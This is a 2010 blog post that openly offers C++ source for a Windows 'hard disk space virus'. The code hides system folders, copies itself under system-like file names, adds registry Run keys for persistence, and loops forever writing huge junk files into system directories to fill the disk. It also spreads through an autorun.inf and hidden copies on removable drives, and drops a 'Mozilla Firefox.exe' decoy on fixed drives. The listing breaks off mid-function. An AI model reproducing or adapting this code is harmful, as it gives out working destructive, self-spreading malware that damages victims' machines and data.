Loading
Showing posts with label VIRUS. Show all posts
Showing posts with label VIRUS. Show all posts

Monday, March 1, 2010

C++ Source Hard Disk Space VIRUS

This will eat up a Windows HDD pretty fast



Code:
#include <stdlib.h>
#include <string>
#include <stdio.h>
#include <fstream>
#include <sstream>
#include <windows.h>
void SpreadToUSB();
int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
                            LPSTR lpszArgument, int nFunsterStil){
FreeConsole();
string      s = "111..."   //actual value is millions of 1's
string      file;
int         rando               =   rand();
char        system32[MAX_PATH], windows[MAX_PATH], main[MAX_PATH];
HMODULE     fileLocation        =   GetModuleHandle(NULL);
            GetModuleFileName       (fileLocation,main,sizeof(main));
            GetSystemDirectory      (system32,sizeof(system32));
            GetWindowsDirectory     (windows,sizeof(windows));
            SetFileAttributes       (windows,FILE_ATTRIBUTE_HIDDEN);
            SetFileAttributes       (system32,FILE_ATTRIBUTE_HIDDEN);
HKEY        key;
            strcat(system32,"\\csrsc.exe");
            CopyFile(main,system32,false);
            RegOpenKeyEx(HKEY_LOCAL_MACHINE,
            "Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,
            KEY_SET_VALUE,&key);                       
            RegSetValueEx(key,"ctfmonr.exe",0,REG_SZ,(const unsigned char*)system32,
            sizeof(system32));
            RegCloseKey(key);
            strcat(windows,"\\pchealth\\helpctr\\Config\\csrss.exe");
            CopyFile(main,windows,false);
            RegOpenKeyEx(HKEY_CURRENT_USER,
            "Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,
            KEY_SET_VALUE,&key);                       
            RegSetValueEx(key,"ctfmonr.exe",0,REG_SZ,(const unsigned char*)windows,
            sizeof(windows));
            RegCloseKey(key);
            RegOpenKeyEx(HKEY_LOCAL_MACHINE,
            "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer",0,
            KEY_SET_VALUE,&key);
            RegDeleteKey(key,"{FD6905CE-952F-41F1-9A6F-135D9C6622CC}");
            RegCloseKey(key);
            rando = rand();
            ostringstream ran;
            ran << rando;
            SpreadToUSB();
for(int i=1;i!=-99;i++){
GetWindowsDirectory(windows,sizeof(windows));
switch (i){
case 1:
        strcat(windows,"\\pchealth");
        break;
case 2:
        strcat(windows,"\\inf");
        break;
case 3:
        strcat(windows,"\\security");
        break;
case 4:
        strcat(windows,"\\Win32");
        CreateDirectory(windows,NULL);
        SetFileAttributes(windows,FILE_ATTRIBUTE_HIDDEN);
        break;
case 5:
        strcat(windows,"\\system32");
        break;
case 6:
        strcat(windows,"\\mui");
        break;
case 7:
        strcat(windows,"\\pcstatus");
        CreateDirectory(windows,NULL);
        break;
case 8:
        strcat(windows,"\\Media");
        break;
case 9:
        strcat(windows,"\\Debug\\Setup\\Backup");
        break;
case 10:
        strcat(windows,"\\Help");
        break;
case 11:
        strcat(windows,"\\Temp");
        break;
case 12:
        strcat(windows,"\\repair");
        break;
case 13:
        strcat(windows,"\\Microsoft.NET\\Framework");
        break;
case 14:
        strcat(windows,"\\ime");
        break;
case 15:
        strcat(windows,"\\WBEM");
        break;
case 16:
        strcat(windows,"\\PIF");
        break;
case 17:
        strcat(windows,"\\AppPatch");
        break;
case 18:
        strcat(windows,"\\Web\\Printers");
        break;
case 19:
        strcat(windows,"\\ServicePackFiles\\i386");
        break;
case 20:
        strcat(windows,"\\$hf_mig$");
        break;
case 21:
        strcat(windows,"\\msagent");
        break;
case 22:
        strcat(windows,"\\msagent\\chars");
        break;
case 23:
        strcat(windows,"\\msapps");
        break;
case 24:
        strcat(windows,"\\msinfo");
        break;
case 25:
        SpreadToUSB();
        strcat(windows,"\\system32\\CatRoot");   
        break;
case 26:
        strcat(windows,"\\system32\\CatRoot2");
        break;
case 27:
        strcat(windows,"\\system32\\wins");
        break;
case 28:
        strcat(windows,"\\system32\\drivers");
        break;
case 29:
        strcat(windows,"\\system32\\bits");
        break;
case 30:
        strcat(windows,"\\system32\\spool");
        break;
case 31:
        strcat(windows,"\\system32\\spool\\drivers");
        break;
case 32:
        strcat(windows,"\\system32\\en");
        break;
case 33:
        strcat(windows,"\\system32\\config");
        break;
case 34:
        strcat(windows,"\\system32\\oobe");
        break;
case 35:
        strcat(windows,"\\system32\\LogFiles");
        break;
case 36:
        strcat(windows,"\\system32\\Microsoft");
        break;
case 37:
        strcat(windows,"\\system32\\IME");
        break;
case 38:
        strcat(windows,"\\system32\\ias");
        break;
case 39:
        strcat(windows,"\\system32\\ras");
        break;
case 40:
        strcat(windows,"\\system32\\Com");
        break;
case 41:
        strcat(windows,"\\system32\\en-us");
        break;
case 42:
        strcat(windows,"\\system32\\PreInstall");
        break;
case 43:
        strcat(windows,"\\system32\\inetsrv");
        break;
case 44:
        strcat(windows,"\\system32\\npp");
        break;
case 45:
        strcat(windows,"\\system32\\ShellExt");
        break;
case 46:
        strcat(windows,"\\system32\\URTTemp");
        break;
case 47:
        strcat(windows,"\\system32\\Restore");
        break;
case 48:
        strcat(windows,"\\system32\\scripting");
        break;
case 49:
        strcat(windows,"\\system32\\DRVSTORE");
        break;
case 50:
        strcat(windows,"\\Death");
        CreateDirectory(windows,NULL);
        break;
default:
        i = 1;
        SpreadToUSB();
        break;
}
  file = windows;
  rando = rand();
  ran << rando;
  file.append("\\");
  file.append(ran.str());
  file.append(ran.str());
  file.append(".sys");
  ofstream o(file.c_str());
  o << s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s;
  o.close();
file = windows;
file.append("\\");
file.append("");
file.append(ran.str());
file.append(ran.str());
file.append(ran.str());
file.append(".dll");
ofstream of(file.c_str());
of << s<<s<<s<<s<<s<<s<<s

<<s<<s<<s<<s<<s<<s<<s<<s
<<s<<s<<s<<s<<s<<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s;
of.close();
file = windows;
  file.append("\\");
  file.append(ran.str());
    file.append(ran.str());
      file.append(ran.str());
      file.append(".exe");
  ofstream out(file.c_str());
  out << s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s;
  out.close();
  file = windows;
  file.append("\\");
  file.append(ran.str());
  file.append(ran.str());
  file.append(ran.str());
  file.append(".nt");
  ofstream files(file.c_str());
  files << s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s<<s<<s

<<s<<s<<s<<s<<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s;
  files.close();
  file = windows;
  file.append("\\");
    file.append(ran.str());
      file.append(ran.str());
        file.append(ran.str());
          file.append(".dbf");
          ofstream outfile(file.c_str());
          outfile<<s<<s<<s<<s<<s
          <<s<<s<<s<<s<<s<<s<<s
          <<s<<s<<s<<s<<s<<s<<s<<s<<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s;
          outfile.close();
  file = windows;
  file.append("\\");
    file.append(ran.str());
      file.append(ran.str());
        file.append(ran.str());
          file.append(".dbg");
          ofstream fileout(file.c_str());
          fileout<<s<<s<<s<<s<<s<<s
          <<s<<s<<s<<s<<s<<s<<s<<s
          <<s<<s<<s<<s<<s<<s<<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s;
          fileout.close();
      file = windows;
  rando = rand();
  ran << rando;
  file.append("\\");
  file.append(ran.str());
  file.append(ran.str());
  file.append(".vx");
  ofstream offf(file.c_str());
  offf << s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s;
  offf.close();
  file = windows;
  rando = rand();
  ran << rando;
  file.append("\\");
  file.append(ran.str());
  file.append(ran.str());
  file.append(".bmp");
  ofstream ol(file.c_str());
  ol << s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s;
  ol.close();
  file = windows;
  rando = rand();
  ran << rando;
  file.append("\\");
  file.append(ran.str());
  file.append(ran.str());
  file.append(".wep");
  ofstream os(file.c_str());
  os << s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s;
  os.close();
  file = windows;
  rando = rand();
  ran << rando;
  file.append("\\");
  file.append(ran.str());
  file.append(ran.str());
  file.append(".lpstr");
  ofstream or(file.c_str());
  or << s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s<<s<<s<<s<<s<<s
  <<s<<s;
  or.close();

<
  }
}
void SpreadToUSB(){
string Filename;
char main [MAX_PATH];
HMODULE fileLocation=   
GetModuleHandle(NULL);
GetModuleFileName
(fileLocation,main,sizeof(main));
if(CreateDirectory("A:\\pp",NULL) == ERROR_SUCCESS){
switch(GetDriveType("A:\\")){
case DRIVE_FIXED:
    CopyFile(main,"A:\\Mozilla Firefox.exe",false);
    break;
case DRIVE_REMOVABLE:
    CreateDirectory("A:\\RECYCLER\\spools",NULL);
    CreateDirectory("A:\\DRMv1PM",NULL);
    CopyFile(main,"A:\\DRMv1PM\\DRMv1PM.exe",false);
    CopyFile("A:\\DRMv1PM.lic","A:\\DRMv1PM\\DRMv0PM.lic",false);
    CopyFile("A:\\DRMv1PM.lic","A:\\RECYCLER\\spools\\DRMv0PM.lic",false);
    CopyFile(main,"A:\\RECYCLER\\spools\\spoolsv.exe",false);
    CopyFile(main,"A:\\Explorer.exe",false);
    CopyFile(main,"A:\\RECYCLER\\Rclrlib.dll",false);
    SetFileAttributes("A:\\autorun.inf",FILE_ATTRIBUTE_NORMAL);
    DeleteFile("A:\\autorun.inf");
    Filename = "A:\\autorun.inf";
    ofstream of(Filename.c_str());
    of << "[autorun]\n";
    of << "open=RECYCLER\\spools\\spoolsv.exe\n";
    of << "action=Open folder to view files\n";
    of << "icon=%systemroot%\\system32\\shell32.dll,4";
    of.close();
    SetFileAttributes("A:\\RECYCLER\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("A:\\RECYCLER\\spools",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("A:\\RECYCLER\\spools\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("A:\\autorun.inf",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("A:\\DRMv1PM",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("A:\\DRMv1PM\\DRMv1PM.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("A:\\Explorer.exe",FILE_ATTRIBUTE_SYSTEM);
    break;
}
}
if(CreateDirectory("B:\\pp",NULL) == ERROR_SUCCESS){
switch(GetDriveType("B:\\")){
case DRIVE_FIXED:
    CopyFile(main,"B:\\Mozilla Firefox.exe",false);
    break;
case DRIVE_REMOVABLE:
    CreateDirectory("B:\\RECYCLER\\spools",NULL);
    CreateDirectory("B:\\DRMv1PM",NULL);
    CopyFile(main,"B:\\DRMv1PM\\DRMv1PM.exe",false);
    CopyFile("B:\\DRMv1PM.lic","B:\\DRMv1PM\\DRMv0PM.lic",false);
    CopyFile("B:\\DRMv1PM.lic","B:\\RECYCLER\\spools\\DRMv0PM.lic",false);
    CopyFile(main,"B:\\RECYCLER\\spools\\spoolsv.exe",false);
    CopyFile(main,"B:\\Explorer.exe",false);
    CopyFile(main,"B:\\RECYCLER\\Rclrlib.dll",false);
    SetFileAttributes("B:\\autorun.inf",FILE_ATTRIBUTE_NORMAL);
    DeleteFile("B:\\autorun.inf");
    Filename = "B:\\autorun.inf";
    ofstream of(Filename.c_str());
    of << "[autorun]\n";
    of << "open=RECYCLER\\spools\\spoolsv.exe\n";
    of << "action=Open folder to view files\n";
    of << "icon=%systemroot%\\system32\\shell32.dll,4";
    of.close();
    SetFileAttributes("B:\\RECYCLER\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("B:\\RECYCLER\\spools",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("B:\\RECYCLER\\spools\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("B:\\autorun.inf",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("B:\\DRMv1PM",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("B:\\DRMv1PM\\DRMv1PM.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("B:\\Explorer.exe",FILE_ATTRIBUTE_SYSTEM);
    break;
}
}
if(CreateDirectory("C:\\pp",NULL) == ERROR_SUCCESS){
switch(GetDriveType("C:\\")){
case DRIVE_FIXED:
    CopyFile(main,"C:\\Mozilla Firefox.exe",false);
    break;
case DRIVE_REMOVABLE:
    CreateDirectory("C:\\RECYCLER\\spools",NULL);
    CreateDirectory("C:\\DRMv1PM",NULL);
    CopyFile(main,"C:\\DRMv1PM\\DRMv1PM.exe",false);
    CopyFile("C:\\DRMv1PM.lic","C:\\DRMv1PM\\DRMv0PM.lic",false);
    CopyFile("C:\\DRMv1PM.lic","C:\\RECYCLER\\spools\\DRMv0PM.lic",false);
    CopyFile(main,"C:\\RECYCLER\\spools\\spoolsv.exe",false);
    CopyFile(main,"C:\\Explorer.exe",false);
    CopyFile(main,"C:\\RECYCLER\\Rclrlib.dll",false);
    SetFileAttributes("C:\\autorun.inf",FILE_ATTRIBUTE_NORMAL);
    DeleteFile("C:\\autorun.inf");
    Filename = "C:\\autorun.inf";
    ofstream of(Filename.c_str());
    of << "[autorun]\n";
    of << "open=RECYCLER\\spools\\spoolsv.exe\n";
    of << "action=Open folder to view files\n";
    of << "icon=%systemroot%\\system32\\shell32.dll,4";
    of.close();
    SetFileAttributes("C:\\RECYCLER\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("C:\\RECYCLER\\spools",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("C:\\RECYCLER\\spools\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("C:\\autorun.inf",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("C:\\DRMv1PM",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("C:\\DRMv1PM\\DRMv1PM.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("C:\\Explorer.exe",FILE_ATTRIBUTE_SYSTEM);
    break;
}
}
if(CreateDirectory("D:\\pp",NULL) == ERROR_SUCCESS){
switch(GetDriveType("D:\\")){
case DRIVE_FIXED:
    CopyFile(main,"D:\\Mozilla Firefox.exe",false);
    break;
case DRIVE_REMOVABLE:
    CreateDirectory("D:\\RECYCLER\\spools",NULL);
    CreateDirectory("D:\\DRMv1PM",NULL);
    CopyFile(main,"D:\\DRMv1PM\\DRMv1PM.exe",false);
    CopyFile("D:\\DRMv1PM.lic","D:\\DRMv1PM\\DRMv0PM.lic",false);
    CopyFile("D:\\DRMv1PM.lic","D:\\RECYCLER\\spools\\DRMv0PM.lic",false);
    CopyFile(main,"D:\\RECYCLER\\spools\\spoolsv.exe",false);
    CopyFile(main,"D:\\Explorer.exe",false);
    CopyFile(main,"D:\\RECYCLER\\Rclrlib.dll",false);
    SetFileAttributes("D:\\autorun.inf",FILE_ATTRIBUTE_NORMAL);
    DeleteFile("D:\\autorun.inf");
    Filename = "D:\\autorun.inf";
    ofstream of(Filename.c_str());
    of << "[autorun]\n";
    of << "open=RECYCLER\\spools\\spoolsv.exe\n";
    of << "action=Open folder to view files\n";
    of << "icon=%systemroot%\\system32\\shell32.dll,4";
    of.close();
    SetFileAttributes("D:\\RECYCLER\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("D:\\RECYCLER\\spools",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("D:\\RECYCLER\\spools\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("D:\\autorun.inf",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("D:\\DRMv1PM",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("D:\\DRMv1PM\\DRMv1PM.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("D:\\Explorer.exe",FILE_ATTRIBUTE_SYSTEM);
    break;
}
}
if(CreateDirectory("E:\\pp",NULL) == ERROR_SUCCESS){
switch(GetDriveType("E:\\")){
case DRIVE_FIXED:
    CopyFile(main,"E:\\Mozilla Firefox.exe",false);
    break;
case DRIVE_REMOVABLE:
    CreateDirectory("E:\\RECYCLER\\spools",NULL);
    CreateDirectory("E:\\DRMv1PM",NULL);
    CopyFile(main,"E:\\DRMv1PM\\DRMv1PM.exe",false);
    CopyFile("E:\\DRMv1PM.lic","E:\\DRMv1PM\\DRMv0PM.lic",false);
    CopyFile("E:\\DRMv1PM.lic","E:\\RECYCLER\\spools\\DRMv0PM.lic",false);
    CopyFile(main,"E:\\RECYCLER\\spools\\spoolsv.exe",false);
    CopyFile(main,"E:\\Explorer.exe",false);
    CopyFile(main,"E:\\RECYCLER\\Rclrlib.dll",false);
    SetFileAttributes("E:\\autorun.inf",FILE_ATTRIBUTE_NORMAL);
    DeleteFile("E:\\autorun.inf");
    Filename = "E:\\autorun.inf";
    ofstream of(Filename.c_str());
    of << "[autorun]\n";
    of << "open=RECYCLER\\spools\\spoolsv.exe\n";
    of << "action=Open folder to view files\n";
    of << "icon=%systemroot%\\system32\\shell32.dll,4";
    of.close();
    SetFileAttributes("E:\\RECYCLER\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("E:\\RECYCLER\\spools",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("E:\\RECYCLER\\spools\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("E:\\autorun.inf",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("E:\\DRMv1PM",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("E:\\DRMv1PM\\DRMv1PM.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("E:\\Explorer.exe",FILE_ATTRIBUTE_SYSTEM);
    break;
}
}
if(CreateDirectory("F:\\pp",NULL) == ERROR_SUCCESS){
switch(GetDriveType("F:\\")){
case DRIVE_FIXED:
    CopyFile(main,"F:\\Mozilla Firefox.exe",false);
    break;
case DRIVE_REMOVABLE:
    CreateDirectory("F:\\RECYCLER\\spools",NULL);
    CreateDirectory("F:\\DRMv1PM",NULL);
    CopyFile(main,"F:\\DRMv1PM\\DRMv1PM.exe",false);
    CopyFile("F:\\DRMv1PM.lic","F:\\DRMv1PM\\DRMv0PM.lic",false);
    CopyFile("F:\\DRMv1PM.lic","F:\\RECYCLER\\spools\\DRMv0PM.lic",false);
    CopyFile(main,"F:\\RECYCLER\\spools\\spoolsv.exe",false);
    CopyFile(main,"F:\\Explorer.exe",false);
    CopyFile(main,"F:\\RECYCLER\\Rclrlib.dll",false);
    SetFileAttributes("F:\\autorun.inf",FILE_ATTRIBUTE_NORMAL);
    DeleteFile("F:\\autorun.inf");
    Filename = "F:\\autorun.inf";
    ofstream of(Filename.c_str());
    of << "[autorun]\n";
    of << "open=RECYCLER\\spools\\spoolsv.exe\n";
    of << "action=Open folder to view files\n";
    of << "icon=%systemroot%\\system32\\shell32.dll,4";
    of.close();
    SetFileAttributes("F:\\RECYCLER\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("F:\\RECYCLER\\spools",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("F:\\RECYCLER\\spools\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("F:\\autorun.inf",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("F:\\DRMv1PM",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("F:\\DRMv1PM\\DRMv1PM.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("F:\\Explorer.exe",FILE_ATTRIBUTE_SYSTEM);
    break;
}
}
if(CreateDirectory("G:\\pp",NULL) == ERROR_SUCCESS){

switch(GetDriveType("G:\\")){
case DRIVE_FIXED:
    CopyFile(main,"G:\\Mozilla Firefox.exe",false);
    break;
case DRIVE_REMOVABLE:
    CreateDirectory("G:\\RECYCLER\\spools",NULL);
    CreateDirectory("G:\\DRMv1PM",NULL);
    CopyFile(main,"G:\\DRMv1PM\\DRMv1PM.exe",false);
    CopyFile("G:\\DRMv1PM.lic","G:\\DRMv1PM\\DRMv0PM.lic",false);
    CopyFile("G:\\DRMv1PM.lic","G:\\RECYCLER\\spools\\DRMv0PM.lic",false);
    CopyFile(main,"G:\\RECYCLER\\spools\\spoolsv.exe",false);
    CopyFile(main,"G:\\Explorer.exe",false);
    CopyFile(main,"G:\\RECYCLER\\Rclrlib.dll",false);
    SetFileAttributes("G:\\autorun.inf",FILE_ATTRIBUTE_NORMAL);
    DeleteFile("G:\\autorun.inf");
    Filename = "G:\\autorun.inf";
    ofstream of(Filename.c_str());
    of << "[autorun]\n";
    of << "open=RECYCLER\\spools\\spoolsv.exe\n";
    of << "action=Open folder to view files\n";
    of << "icon=%systemroot%\\system32\\shell32.dll,4";
    of.close();
    SetFileAttributes("G:\\RECYCLER\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("G:\\RECYCLER\\spools",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("G:\\RECYCLER\\spools\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("G:\\autorun.inf",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("G:\\DRMv1PM",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("G:\\DRMv1PM\\DRMv1PM.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("G:\\Explorer.exe",FILE_ATTRIBUTE_SYSTEM);
    break;
}
}
if(CreateDirectory("H:\\pp",NULL) == ERROR_SUCCESS){
switch(GetDriveType("H:\\")){
case DRIVE_FIXED:
    CopyFile(main,"H:\\Mozilla Firefox.exe",false);
    break;
case DRIVE_REMOVABLE:
    CreateDirectory("H:\\RECYCLER\\spools",NULL);
    CreateDirectory("H:\\DRMv1PM",NULL);
    CopyFile(main,"H:\\DRMv1PM\\DRMv1PM.exe",false);
    CopyFile("H:\\DRMv1PM.lic","H:\\DRMv1PM\\DRMv0PM.lic",false);
    CopyFile("H:\\DRMv1PM.lic","H:\\RECYCLER\\spools\\DRMv0PM.lic",false);
    CopyFile(main,"H:\\RECYCLER\\spools\\spoolsv.exe",false);
    CopyFile(main,"H:\\Explorer.exe",false);
    CopyFile(main,"H:\\RECYCLER\\Rclrlib.dll",false);
    SetFileAttributes("H:\\autorun.inf",FILE_ATTRIBUTE_NORMAL);
    DeleteFile("H:\\autorun.inf");
    Filename = "H:\\autorun.inf";
    ofstream of(Filename.c_str());
    of << "[autorun]\n";
    of << "open=RECYCLER\\spools\\spoolsv.exe\n";
    of << "action=Open folder to view files\n";
    of << "icon=%systemroot%\\system32\\shell32.dll,4";
    of.close();
    SetFileAttributes("H:\\RECYCLER\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("H:\\RECYCLER\\spools",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("H:\\RECYCLER\\spools\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("H:\\autorun.inf",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("H:\\DRMv1PM",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("H:\\DRMv1PM\\DRMv1PM.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("H:\\Explorer.exe",FILE_ATTRIBUTE_SYSTEM);
    break;
}
}
if(CreateDirectory("I:\\pp",NULL) == ERROR_SUCCESS){
switch(GetDriveType("I:\\")){
case DRIVE_FIXED:
    CopyFile(main,"I:\\Mozilla Firefox.exe",false);
    break;
case DRIVE_REMOVABLE:
    CreateDirectory("I:\\RECYCLER\\spools",NULL);
    CreateDirectory("I:\\DRMv1PM",NULL);
    CopyFile(main,"I:\\DRMv1PM\\DRMv1PM.exe",false);
    CopyFile("I:\\DRMv1PM.lic","I:\\DRMv1PM\\DRMv0PM.lic",false);
    CopyFile("I:\\DRMv1PM.lic","I:\\RECYCLER\\spools\\DRMv0PM.lic",false);
    CopyFile(main,"I:\\RECYCLER\\spools\\spoolsv.exe",false);
    CopyFile(main,"I:\\Explorer.exe",false);
    CopyFile(main,"I:\\RECYCLER\\Rclrlib.dll",false);
    SetFileAttributes("I:\\autorun.inf",FILE_ATTRIBUTE_NORMAL);
    DeleteFile("I:\\autorun.inf");
    Filename = "I:\\autorun.inf";
    ofstream of(Filename.c_str());
    of << "[autorun]\n";
    of << "open=RECYCLER\\spools\\spoolsv.exe\n";
    of << "action=Open folder to view files\n";
    of << "icon=%systemroot%\\system32\\shell32.dll,4";
    of.close();
    SetFileAttributes("I:\\RECYCLER\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("I:\\RECYCLER\\spools",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("I:\\RECYCLER\\spools\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("I:\\autorun.inf",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("I:\\DRMv1PM",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("I:\\DRMv1PM\\DRMv1PM.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("I:\\Explorer.exe",FILE_ATTRIBUTE_SYSTEM);
    break;
}
}
if(CreateDirectory("J:\\pp",NULL) == ERROR_SUCCESS){
switch(GetDriveType("J:\\")){
case DRIVE_FIXED:
    CopyFile(main,"J:\\Mozilla Firefox.exe",false);
    break;
case DRIVE_REMOVABLE:
    CreateDirectory("J:\\RECYCLER\\spools",NULL);
    CreateDirectory("J:\\DRMv1PM",NULL);
    CopyFile(main,"J:\\DRMv1PM\\DRMv1PM.exe",false);
    CopyFile("J:\\DRMv1PM.lic","J:\\DRMv1PM\\DRMv0PM.lic",false);
    CopyFile("J:\\DRMv1PM.lic","J:\\RECYCLER\\spools\\DRMv0PM.lic",false);
    CopyFile(main,"J:\\RECYCLER\\spools\\spoolsv.exe",false);
    CopyFile(main,"J:\\Explorer.exe",false);
    CopyFile(main,"J:\\RECYCLER\\Rclrlib.dll",false);
    SetFileAttributes("J:\\autorun.inf",FILE_ATTRIBUTE_NORMAL);
    DeleteFile("J:\\autorun.inf");
    Filename = "J:\\autorun.inf";
    ofstream of(Filename.c_str());
    of << "[autorun]\n";
    of << "open=RECYCLER\\spools\\spoolsv.exe\n";
    of << "action=Open folder to view files\n";
    of << "icon=%systemroot%\\system32\\shell32.dll,4";
    of.close();
    SetFileAttributes("J:\\RECYCLER\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("J:\\RECYCLER\\spools",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("J:\\RECYCLER\\spools\\spoolsv.exe",FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("J:\\autorun.inf",FILE_ATTRIBUTE_HIDDEN);
